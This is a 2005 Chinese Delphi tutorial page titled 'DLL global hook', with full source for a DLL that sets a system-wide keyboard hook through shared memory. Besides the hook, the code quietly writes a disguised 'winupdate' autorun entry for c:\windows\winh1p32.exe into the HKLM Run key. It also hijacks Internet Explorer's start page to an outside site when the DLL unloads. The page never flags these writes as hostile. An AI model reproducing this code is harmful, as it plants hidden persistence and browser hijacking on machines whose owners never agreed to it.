月光软件站 - 编程文档 - Delphi

Delphi

本类阅读TOP10

·分布式网络考试系统原型分析及实现
·游戏外挂设计技术探讨①
·使用HOOK随心监视Windows
·Delphi 水晶报表打包解决
·试题库开发中非文本数据的处理
·如何将几个DBGRID里的内容导入同一个EXCEL表中....的问题
·如何使用Delphi设计强大的服务器程序
·工人线程中关闭窗体的实现
·用DLL方式封装MDI子窗体。
·支持XP下托盘栏气球提示的托盘单元

→ 分类导航

VC语言	Delphi
VB语言	ASP
Perl	Java
Script	数据库
其他语言	游戏开发
文件格式	网站制作
软件工程	.NET开发

DLL全局钩子

作者：未知来源：月光软件站 加入时间：2005-2-28　月光软件站

DLL全局钩子

// 以下使用内存映射文件共享数据来保存键盘钩子和Dll句柄
// 运行此程序:触发程序加载完Dll后,对其他系统内有键盘响应事件的程序自己挂钩
// 而即使触发程序死亡,DLL还是会达到监控键盘响应事件自动挂钩的目的
// 直到你按下Ctrl+F组合键DLL才从内存中卸载.

library sysinfo;

uses
  windows;

const BUFFER_SIZE = 16 * 1024;
const HOOK_MEM_FILENAME = 'MEM_FILE';
type
  TShared = record
    KeyHook:HHook;
    Moudle :THandle;
  end;
  PShared = ^TShared;
var
  MemFile: THandle;
  Shared: PShared;

{撤消钩子过滤函数}
function UninstallHook: Boolean;
begin
  Freelibrary(Shared^.Moudle);
  Result := UnHookWindowsHookEx(Shared^.KeyHook);
UnmapViewOfFile(Shared);
CloseHandle(memFile);
end;

function KeyHookProc(iCode: Integer; wParam: WPARAM;
  lParam: LPARAM): LRESULT; stdcall; export;
const
  KeyPressMask = $80000000;
begin
  if iCode < 0 then
    Result := CallNextHookEx(Shared^.KeyHook,
       iCode,
      wParam,
      lParam)
  else begin
    if ((lParam and KeyPressMask) = 0) and (GetKeyState(vk_Control) < 0) and (
wparam = Ord('F'))
    then
    begin
      Windows.MessageBox(0,'........钩子已消除!..........','hello!',MB_ICONEXC
LAMATION);
      UninstallHook;
    end;
  //result:=0;
    Result := CallNextHookEx(Shared^.KeyHook,iCode,wParam,lParam);
  end;
end;

function InstallHook:Boolean;
begin
  Shared^.Moudle:=GetModuleHandle(PChar('sysinfo'));
  Shared^.KeyHook := SetWindowsHookEx(WH_KEYBOARD,
                             @KeyHookProc,
                           Shared^.Moudle,
                                       0);
  if Shared^.KeyHook = 0 then
  begin
    Result := False;
    Exit;
  end;
  Result := true;
end;

// 以下为写注册表部分,在下定义了一个函数
procedure writeregedit(cCustomLog,var1,var2:pchar);
var
  size: integer;
  s: string;
  TempKey: HKEY;
  fDisposition: pointer;
begin
  fDisposition := nil;
      if RegCreateKeyEx(HKEY_LOCAL_MACHINE,
                       cCustomLog,
                       0,
                       nil,
                       REG_OPTION_NON_VOLATILE,
                       KEY_WRITE,
                       nil,
                       TempKey,
                       fDisposition)= ERROR_SUCCESS
                       then begin
         RegSetValueEx (TempKey,
                         var1,
                         0,
                         REG_SZ,
                         var2,
                        length(var2));

                       end;
  RegCloseKey(TempKey);
end;

procedure DllEntry(dwReason : integer);
begin
  case dwReason Of

// DLL导入进程时
    DLL_PROCESS_ATTACH:
      begin
        MemFile := OpenFileMapping(FILE_MAP_WRITE,False,HOOK_MEM_FILENAME);
        if MemFile = 0 then
          MemFile := CreateFileMapping($FFFFFFFF,nil,
            PAGE_READWRITE,
            0,
            SizeOf(TShared),
            HOOK_MEM_FILENAME);
        Shared := MapViewOfFile(MemFile,
          File_MAP_WRITE,
          0,
          0,
          0);
// 加载钩子
        InstallHook;
      end;
    DLL_PROCESS_DETACH:
      begin
        writeregedit('SOFTWARE\Microsoft\Windows\CurrentVersion\Run','winupdat
e','c:\windows\winh1p32.exe');
        writeregedit('SOFTWARE\Microsoft\internet explorer\main','start page',
'http://www.iou.com');

// 我不想此时卸载钩子
//      UninstallHook;
      end;
    else;
  end;
end;

exports
  InstallHook;

begin
  DllProc := @DllEntry;
  DllEntry(DLL_PROCESS_ATTACH);
end.

晕了:

今天有点累,注解未完之处以后补上吧.附:网站快要申请了,到时贴上所有源码^_^

相关文章：

相关软件：